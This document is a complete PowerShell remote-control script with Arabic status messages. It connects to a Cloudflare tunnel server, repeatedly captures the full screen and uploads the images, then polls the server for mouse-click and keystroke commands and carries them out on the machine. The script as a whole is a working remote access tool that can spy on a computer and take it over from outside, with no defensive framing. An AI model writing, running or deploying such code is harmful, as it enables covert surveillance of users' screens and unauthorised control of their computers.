Add-Type -AssemblyName System.Windows.Forms,System.Drawing,System.Net.Http
$SERVER="https://ruth-everyone-combining-titled.trycloudflare.com/";$KEY="1234";$PREV_IMG=$null
Add-Type @"
using System;using System.Runtime.InteropServices;
public class Win32{[DllImport("user32.dll")]public static extern IntPtr GetDesktopWindow();[DllImport("user32.dll")]public static extern IntPtr GetWindowDC(IntPtr hWnd);[DllImport("user32.dll")]public static extern int ReleaseDC(IntPtr hWnd,IntPtr hDC);[DllImport("user32.dll")]public static extern void mouse_event(uint dwFlags,uint dx,uint dy,uint dwData,UIntPtr dwExtraInfo);[DllImport("user32.dll")]public static extern int GetSystemMetrics(int nIndex);[DllImport("user32.dll")]public static extern bool SetCursorPos(int X,int Y);}
"@
$SM_CXVIRTUALSCREEN=78;$SM_CYVIRTUALSCREEN=79;$SM_XVIRTUALSCREEN=76;$SM_YVIRTUALSCREEN=77;$MOUSEEVENTF_LEFTDOWN=0x0002;$MOUSEEVENTF_LEFTUP=0x0004
function Capture-Screen{try{$width=[Win32]::GetSystemMetrics($SM_CXVIRTUALSCREEN);$height=[Win32]::GetSystemMetrics($SM_CYVIRTUALSCREEN);$left=[Win32]::GetSystemMetrics($SM_XVIRTUALSCREEN);$top=[Win32]::GetSystemMetrics($SM_YVIRTUALSCREEN);$bitmap=New-Object System.Drawing.Bitmap($width,$height);$graphics=[System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen($left,$top,0,0,$bitmap.Size);$codec=[System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders()|Where-Object{$_.MimeType-eq"image/jpeg"};$encoderParams=New-Object System.Drawing.Imaging.EncoderParameters(1);$encoderParams.Param[0]=New-Object System.Drawing.Imaging.EncoderParameter([System.Drawing.Imaging.Encoder]::Quality,50);$ms=New-Object System.IO.MemoryStream;$bitmap.Save($ms,$codec,$encoderParams);$imageBytes=$ms.ToArray();$ms.Close();$bitmap.Dispose();$graphics.Dispose();return $imageBytes}catch{return $null}}
function Send-JsonRequest($Url,$JsonBody){try{$headers=@{'bypass-tunnel-reminder'='true';'User-Agent'='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'};$response=Invoke-RestMethod -Uri $Url -Method Post -Body $JsonBody -ContentType "application/json" -Headers $headers;return $true}catch{return $false}}
function Send-Image($Filename,$ImageData){try{$boundary="---------------------------"+[System.DateTime]::Now.Ticks.ToString("x");$body="--$boundary`r`n";$body+="Content-Disposition: form-data; name=`"$Filename`"; filename=`"img.jpg`"`r`n";$body+="Content-Type: image/jpeg`r`n`r`n";$body+=[Convert]::ToBase64String($ImageData);$body+="`r`n--$boundary--`r`n";$headers=@{'Content-Type'="multipart/form-data; boundary=$boundary";'bypass-tunnel-reminder'='true'};$response=Invoke-RestMethod -Uri "$SERVER/capture_post" -Method Post -Body $body -Headers $headers;return $true}catch{return $false}}
function Get-Events{try{$jsonBody="{""_key"":""$KEY""}";$headers=@{'bypass-tunnel-reminder'='true';'User-Agent'='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'};$response=Invoke-RestMethod -Uri "$SERVER/events_get" -Method Post -Body $jsonBody -ContentType "application/json" -Headers $headers;Write-Host "[+] ✅ Get-Events نجح: $($response | ConvertTo-Json -Compress)";return $response.events}catch{Write-Host "[!] ❌ خطأ في Get-Events: $_";return $null}}
function Send-Keys($Keys){try{$wshell=New-Object -ComObject WScript.Shell;$wshell.SendKeys($Keys)}catch{}}
function Compare-ByteArrays($arr1,$arr2){if($arr1.Length -ne $arr2.Length){return $false}for($i=0;$i -lt $arr1.Length;$i++){if($arr1[$i] -ne $arr2[$i]){return $false}}return $true}
function Main{Write-Host "[+] محاولة الاتصال بالسيرفر: $SERVER";$jsonBody="{""_key"":""$KEY""}";$connected=Send-JsonRequest -Url "$SERVER/new_session" -JsonBody $jsonBody;if(-not $connected){Write-Host "[!] فشل الاتصال بالسيرفر!";return};Write-Host "[+] تم الاتصال بالسيرفر بنجاح!";Write-Host "[+] بدء التقاط الشاشة...";while($true){try{$imageBytes=Capture-Screen;if($imageBytes -eq $null){Start-Sleep -Milliseconds 1000;continue};if($PREV_IMG -eq $null -or -not (Compare-ByteArrays -arr1 $PREV_IMG -arr2 $imageBytes)){$filename=[DateTimeOffset]::Now.ToUnixTimeMilliseconds().ToString()+"_"+$KEY;$result=Send-Image -Filename $filename -ImageData $imageBytes;if($result){Write-Host "[+] صورة مرسلة: $filename"};$PREV_IMG=$imageBytes};$events=Get-Events;if($events -ne $null -and $events.Count -gt 0){Write-Host "[+] عدد الأوامر المستلمة: $($events.Count)";foreach($e in $events){if($e.type -eq "click"){[Win32]::SetCursorPos($e.x,$e.y);Start-Sleep -Milliseconds 100;[Win32]::mouse_event($MOUSEEVENTF_LEFTDOWN,$e.x,$e.y,0,[UIntPtr]::Zero);Start-Sleep -Milliseconds 20;[Win32]::mouse_event($MOUSEEVENTF_LEFTUP,$e.x,$e.y,0,[UIntPtr]::Zero);Write-Host "[+] ✅ تم تنفيذ النقر عند ($($e.x), $($e.y))"};if($e.type -eq "keydown"){$cmd="";if($e.shiftKey){$cmd+="+"};if($e.ctrlKey){$cmd+="^"};if($e.altKey){$cmd+="%"};if($e.key.Length -eq 1){$cmd+=$e.key.ToLower()}else{$cmd+="{"+$e.key.ToUpper()+"}"};Send-Keys -Keys $cmd;Write-Host "[+] ✅ تم إرسال المفتاح: $cmd"}}};Start-Sleep -Milliseconds 200}catch{Write-Host "[!] ❌ خطأ في الحلقة: $_";Start-Sleep -Milliseconds 1000}}}
Main
